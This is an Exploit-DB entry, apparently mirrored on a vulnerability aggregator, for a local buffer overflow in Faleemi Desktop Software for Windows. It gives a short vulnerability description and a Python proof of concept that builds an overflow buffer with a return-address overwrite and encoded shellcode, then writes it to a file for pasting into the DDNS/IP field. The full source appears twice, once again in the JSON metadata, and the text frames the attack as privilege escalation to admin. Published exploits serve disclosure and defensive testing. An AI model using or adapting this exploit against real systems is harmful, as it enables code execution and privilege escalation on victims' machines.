Search...

Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow

2018-03-30T00:00:00

ID EDB-ID:44382
Type exploitdb
Reporter Exploit-DB
Modified 2018-03-30T00:00:00

Description

Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow. Local exploit for Windows platform

                                        
                                            '''
Faleemi Desktop Software for Windows- (DDNS/IP) Local Buffer Overflow 

Vuln Description:
Faleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. When overly input is given to DDNS/IP parameter, it overflows the buffer corrupting EIP which can utilized cleverly for local arbitrary code execution. If this software is running as admin and if a low priv user has access to this application to enter new device, he can exploit the Buffer Overflow in the DDNS/IP parameter to obtain Admin privs. An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Vulnerable Application Info:
1. Faleemi Desktop Software for Windows
URL: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe

2. Faleemi Desktop Software for Windows (Beta)
URL: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe

After hitting enter new device, click Enter device manually
'''

#!/usr/bin/python 
import socket
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
"\x55\x43\x30\x41\x41")

buffer = "A" * 132 + "\x4B\x43\x71\x6B" + calc

f = open('shellcode.txt', "wb")
f.write(buffer)
f.close()

JSON Vulners Source

Initial Source

{"id": "EDB-ID:44382", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow", "description": "Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow. Local exploit for Windows platform", "published": "2018-03-30T00:00:00", "modified": "2018-03-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/44382/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2018-05-24T14:11:29", "viewCount": 5, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-05-24T14:11:29", "rev": 2}, "dependencies": {"references": [], "modified": "2018-05-24T14:11:29", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://www.exploit-db.com/download/44382/", "sourceData": "'''\r\nFaleemi Desktop Software for Windows- (DDNS/IP) Local Buffer Overflow \r\n\r\nVuln Description:\r\nFaleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. When overly input is given to DDNS/IP parameter, it overflows the buffer corrupting EIP which can utilized cleverly for local arbitrary code execution. If this software is running as admin and if a low priv user has access to this application to enter new device, he can exploit the Buffer Overflow in the DDNS/IP parameter to obtain Admin privs. An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\nVulnerable Application Info:\r\n1. Faleemi Desktop Software for Windows\r\nURL: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe\r\n\r\n2. Faleemi Desktop Software for Windows (Beta)\r\nURL: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe\r\n\r\nAfter hitting enter new device, click Enter device manually\r\n'''\r\n\r\n#!/usr/bin/python \r\nimport socket\r\ncalc = (\"\\x54\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\"\r\n\"\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\"\r\n\"\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x59\\x6c\\x6b\\x58\\x6b\\x32\\x53\\x30\"\r\n\"\\x57\\x70\\x67\\x70\\x53\\x50\\x4e\\x69\\x39\\x75\\x54\\x71\\x39\\x50\\x61\"\r\n\"\\x74\\x6c\\x4b\\x66\\x30\\x44\\x70\\x6c\\x4b\\x73\\x62\\x46\\x6c\\x6e\\x6b\"\r\n\"\\x66\\x32\\x66\\x74\\x4e\\x6b\\x62\\x52\\x65\\x78\\x44\\x4f\\x78\\x37\\x72\"\r\n\"\\x6a\\x46\\x46\\x44\\x71\\x6b\\x4f\\x4c\\x6c\\x57\\x4c\\x53\\x51\\x51\\x6c\"\r\n\"\\x47\\x72\\x34\\x6c\\x47\\x50\\x69\\x51\\x6a\\x6f\\x64\\x4d\\x37\\x71\\x59\"\r\n\"\\x57\\x6d\\x32\\x5a\\x52\\x51\\x42\\x61\\x47\\x4e\\x6b\\x36\\x32\\x44\\x50\"\r\n\"\\x6c\\x4b\\x73\\x7a\\x55\\x6c\\x4c\\x4b\\x42\\x6c\\x52\\x31\\x63\\x48\\x6d\"\r\n\"\\x33\\x32\\x68\\x43\\x31\\x5a\\x71\\x53\\x61\\x6c\\x4b\\x36\\x39\\x31\\x30\"\r\n\"\\x73\\x31\\x4e\\x33\\x4c\\x4b\\x50\\x49\\x65\\x48\\x39\\x73\\x46\\x5a\\x37\"\r\n\"\\x39\\x4e\\x6b\\x64\\x74\\x4e\\x6b\\x63\\x31\\x78\\x56\\x35\\x61\\x6b\\x4f\"\r\n\"\\x6e\\x4c\\x39\\x51\\x7a\\x6f\\x46\\x6d\\x63\\x31\\x4b\\x77\\x50\\x38\\x6d\"\r\n\"\\x30\\x32\\x55\\x79\\x66\\x35\\x53\\x71\\x6d\\x78\\x78\\x57\\x4b\\x61\\x6d\"\r\n\"\\x35\\x74\\x70\\x75\\x69\\x74\\x30\\x58\\x4c\\x4b\\x30\\x58\\x31\\x34\\x75\"\r\n\"\\x51\\x69\\x43\\x70\\x66\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x6c\\x4b\\x42\\x78\"\r\n\"\\x75\\x4c\\x76\\x61\\x4e\\x33\\x4e\\x6b\\x57\\x74\\x4e\\x6b\\x55\\x51\\x6a\"\r\n\"\\x70\\x4d\\x59\\x67\\x34\\x67\\x54\\x77\\x54\\x63\\x6b\\x53\\x6b\\x33\\x51\"\r\n\"\\x42\\x79\\x73\\x6a\\x33\\x61\\x69\\x6f\\x59\\x70\\x61\\x4f\\x61\\x4f\\x42\"\r\n\"\\x7a\\x6e\\x6b\\x34\\x52\\x58\\x6b\\x6e\\x6d\\x61\\x4d\\x62\\x4a\\x35\\x51\"\r\n\"\\x4c\\x4d\\x4f\\x75\\x4f\\x42\\x73\\x30\\x33\\x30\\x63\\x30\\x46\\x30\\x42\"\r\n\"\\x48\\x45\\x61\\x6e\\x6b\\x52\\x4f\\x4d\\x57\\x6b\\x4f\\x4a\\x75\\x4d\\x6b\"\r\n\"\\x4c\\x30\\x58\\x35\\x39\\x32\\x51\\x46\\x51\\x78\\x49\\x36\\x4a\\x35\\x6f\"\r\n\"\\x4d\\x4d\\x4d\\x59\\x6f\\x4a\\x75\\x55\\x6c\\x54\\x46\\x31\\x6c\\x65\\x5a\"\r\n\"\\x6d\\x50\\x59\\x6b\\x49\\x70\\x31\\x65\\x37\\x75\\x4f\\x4b\\x73\\x77\\x62\"\r\n\"\\x33\\x62\\x52\\x52\\x4f\\x53\\x5a\\x73\\x30\\x76\\x33\\x79\\x6f\\x68\\x55\"\r\n\"\\x62\\x43\\x70\\x61\\x42\\x4c\\x35\\x33\\x76\\x4e\\x53\\x55\\x30\\x78\\x43\"\r\n\"\\x55\\x43\\x30\\x41\\x41\")\r\n\r\nbuffer = \"A\" * 132 + \"\\x4B\\x43\\x71\\x6B\" + calc\r\n\r\nf = open('shellcode.txt', \"wb\")\r\nf.write(buffer)\r\nf.close()", "osvdbidlist": [], "immutableFields": []}